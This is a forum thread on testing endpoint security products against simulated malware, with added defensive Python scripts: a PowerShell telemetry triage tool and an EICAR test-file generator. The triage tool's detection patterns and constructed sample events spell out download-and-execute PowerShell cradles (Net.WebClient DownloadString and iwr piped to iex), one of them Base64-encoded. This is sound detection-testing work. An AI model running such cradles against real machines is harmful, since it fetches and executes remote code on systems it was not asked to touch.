Hey everyone! I'm currently testing some EDR/XDR/AV products and want to ensure I cover all bases when it comes to simulating real threats like ransomware, malware, and viruses. I've come across various tools and resources that might come in handy, such as theZoo, VX-Underground samples, MalwareBazaar, Atomic Red Team, Caldera, RanSim, AttackIQ, and Infection Monkey. I'm leaning toward using MalwareBazaar to run actual malware samples on isolated devices. For my lab setup, would you recommend using a few laptops in a separate VLAN with internet access or opting for VMs instead? I'd love to hear your feedback and suggestions!
6 Answers
When testing, isolating your devices is essential, but keep in mind that if they’re completely air-gapped, you might not get accurate results. A lot of security products rely on cloud services for optimal detection, and if your devices aren’t online, they might not perform as well. Just something to think about!
I recommend checking out some additional tools that could be beneficial for your testing. For instance, Malpedia provides a comprehensive reference for malware families, and the Picus Emerging Threat Simulator is a great tool for simulating real-world threats. Good luck with your testing!
If you're looking to simulate attacks, you should focus on different stages like enumeration, installing RATs, and exfiltration tools. Test for unusual behavior rather than just waiting for malware to deploy. Make sure to check for things like PowerShell commands or unusual dropped files. Catching the early indicators of compromise is key!
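As an added example (not part of the original thread, and not tied to any particular EDR product), here is a small triage routine for the "check for PowerShell commands" point above: it takes constructed process-creation events in an assumed `image | cmdline` layout, decodes `-EncodedCommand` payloads (Base64 over UTF-16LE), and flags the behaviours a lab run should expect the product to surface (hidden window, profile/execution-policy suppression, download cradles, `IEX`). The sample events, field layout and IP addresses are constructed for illustration.

```python
"""
Triage constructed process-creation events for suspicious PowerShell usage.
Added example, not from the original thread. The "image | cmdline" layout
and the sample events below are constructed; they mirror no specific EDR.
"""
import base64
import re
from dataclasses import dataclass, field
from typing import List, Optional

POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe", "powershell_ise.exe"}

# Behaviours worth alerting on. PowerShell accepts any unambiguous prefix of a
# switch (-w/-win/-WindowStyle, -nop/-NoProfile, -ep/-exec/-ExecutionPolicy),
# so the switch patterns match the prefix rather than one fixed spelling.
INDICATORS = {
    "hidden_window": r"-w[a-z]*\s+hidden",
    "no_profile": r"-nop[a-z]*\b",
    "exec_bypass": r"-e[a-z]*\s+bypass",
    "download_cradle": r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient|start-bitstransfer",
    "invoke_expression": r"\biex\b|invoke-expression",
    "reflective_load": r"\[reflection\.assembly\]::load|frombase64string",
    "amsi_tamper": r"amsiinitfailed|amsiutils",
}


def encode_ps(script: str) -> str:
    """Encode a script the way -EncodedCommand expects: Base64 over UTF-16LE."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(blob: str) -> Optional[str]:
    """Reverse encode_ps(); returns None when the token is not valid Base64."""
    blob = blob.strip().strip("\"'")
    blob += "=" * (-len(blob) % 4)          # tolerate stripped padding
    try:
        raw = base64.b64decode(blob, validate=True)
    except ValueError:                       # binascii.Error is a ValueError
        return None
    return raw.decode("utf-16-le", errors="replace")


def extract_encoded_command(tokens: List[str]) -> Optional[str]:
    """Return the argument following any prefix of -EncodedCommand (-e, -ec, -enc, ...)."""
    for i, tok in enumerate(tokens[:-1]):
        if not tok.startswith(("-", "/")):
            continue
        name = tok.lstrip("-/").lower()
        if name and "encodedcommand".startswith(name):
            return tokens[i + 1]
    return None


@dataclass
class Finding:
    image: str
    cmdline: str
    decoded: Optional[str]
    indicators: List[str] = field(default_factory=list)


def triage_event(image: str, cmdline: str) -> Optional[Finding]:
    """Return a Finding for PowerShell launches, None for anything else."""
    if image.rsplit("\\", 1)[-1].lower() not in POWERSHELL_IMAGES:
        return None
    blob = extract_encoded_command(cmdline.split())
    decoded = decode_encoded_command(blob) if blob is not None else None
    # Scan the visible command line plus the decoded payload: the interesting
    # part of an encoded command is only visible after decoding.
    haystack = cmdline + ("\n" + decoded if decoded else "")
    hits = [name for name, rx in INDICATORS.items() if re.search(rx, haystack, re.IGNORECASE)]
    if blob is not None:
        hits.insert(0, "encoded_command")
    return Finding(image, cmdline, decoded, hits)


def triage_events(events: List[str]) -> List[Finding]:
    """Parse 'image | cmdline' lines and keep only events with at least one indicator."""
    findings = []
    for line in events:
        image, _, cmdline = line.partition(" | ")
        f = triage_event(image.strip(), cmdline.strip())
        if f and f.indicators:
            findings.append(f)
    return findings


# Constructed sample telemetry (198.51.100.0/24 is a documentation range).
CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/stage.ps1')"
SAMPLE_EVENTS = [
    r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell.exe -Command Get-Service",
    r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | powershell.exe -NoP -W Hidden -ExecutionPolicy Bypass -Enc " + encode_ps(CRADLE),
    r'C:\Program Files\PowerShell\7\pwsh.exe | pwsh -nop -c "iwr http://198.51.100.7/a.ps1 | iex"',
    r"C:\Windows\System32\cmd.exe | cmd.exe /c whoami",
]

if __name__ == "__main__":
    for f in triage_events(SAMPLE_EVENTS):
        print(f"{len(f.indicators)} indicator(s): {', '.join(f.indicators)}")
        if f.decoded:
            print(f"    decoded: {f.decoded}")
```

Run the same decoder over the process telemetry your EDR exports after each simulated stage: if the product shows the raw `-Enc` blob but never the decoded cradle, that is the detection gap to write up.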
Based on my experience, I’d suggest using simulation tools like AttackIQ or Atomic Red Team. This way, you can avoid the risks that come with isolation and learn what gets blocked or detected without worrying about the environment too much. Just keep in mind that trial versions might have some features turned off.
I've heard of someone who went ahead with testing and ended up infecting their company's network. Definitely be careful with this. Isolation can help, but running real examples can be risky if you're not managing the environment properly.
Honestly, I'm not convinced you need to go through the hassle of specific examples. VirusTotal has done a lot of the legwork already. For basic functionality checks, using an EICAR test file usually suffices. The malware samples might not offer anything new for testing detections anyway.
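As an added example (not part of the original thread), here is what a basic EICAR functionality check can look like when it goes a little beyond dropping one file: the same public 68-byte test string is delivered as a plain file, a renamed file, a ZIP and a nested ZIP, so you can see separately whether on-access scanning, extension-agnostic scanning and archive unpacking all fire. The output directory and the 10-second settle time are assumptions; adjust them for the product under test.

```python
"""
Build EICAR test artefacts for a basic on-access / archive-scan check.
Added example, not from the original thread. EICAR is a public, harmless
test string that AV vendors agree to detect; it exercises the scanning
path, not detection quality. Output directory and settle time are assumed.
"""
import io
import sys
import time
import zipfile
from pathlib import Path
from typing import Dict, List

# The 68-byte EICAR string, split across two literals so this source file is
# less likely to be quarantined when it sits on a scanned share.
EICAR = (
    "X5O!P%@AP[4\\PZX54(P^)7CC)7}$"
    "EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*"
).encode("ascii")


def zip_bytes(name: str, payload: bytes) -> bytes:
    """Wrap payload in an in-memory ZIP archive under the given member name."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr(name, payload)
    return buf.getvalue()


def unzip_once(data: bytes, name: str) -> bytes:
    """Extract one member from an in-memory ZIP (used to verify the variants)."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        return zf.read(name)


def build_variants() -> Dict[str, bytes]:
    """Return {filename: content}; each variant exercises a different scan path."""
    inner = zip_bytes("eicar.com", EICAR)
    return {
        "eicar.com": EICAR,                        # plain on-access scan
        "eicar.txt": EICAR,                        # extension-agnostic scanning
        "eicar.zip": inner,                        # archive unpacking
        "eicar_nested.zip": zip_bytes("eicar.zip", inner),  # nested archive depth
    }


def drop_variants(target_dir: Path) -> List[Path]:
    """Write every variant to target_dir and return the paths written."""
    target_dir.mkdir(parents=True, exist_ok=True)
    written = []
    for name, content in build_variants().items():
        path = target_dir / name
        path.write_bytes(content)
        written.append(path)
    return written


def surviving_files(paths: List[Path], settle_seconds: float = 10.0) -> List[Path]:
    """After giving the on-access scanner time to react, report which test
    files are still present. Anything left marks a delivery path the product
    did not act on (or one it only scans at execution time)."""
    time.sleep(settle_seconds)
    return [p for p in paths if p.exists()]


if __name__ == "__main__":
    target = Path(sys.argv[1] if len(sys.argv) > 1 else "eicar_test")  # assumed default
    paths = drop_variants(target)
    left = surviving_files(paths)
    for p in paths:
        print(f"{'MISSED' if p in left else 'caught'}  {p.name}")
```

Run it on the endpoint under test and read the per-variant result, not just pass/fail: a product that removes `eicar.com` but leaves `eicar_nested.zip` is telling you something about its archive-depth setting that a single EICAR drop never would.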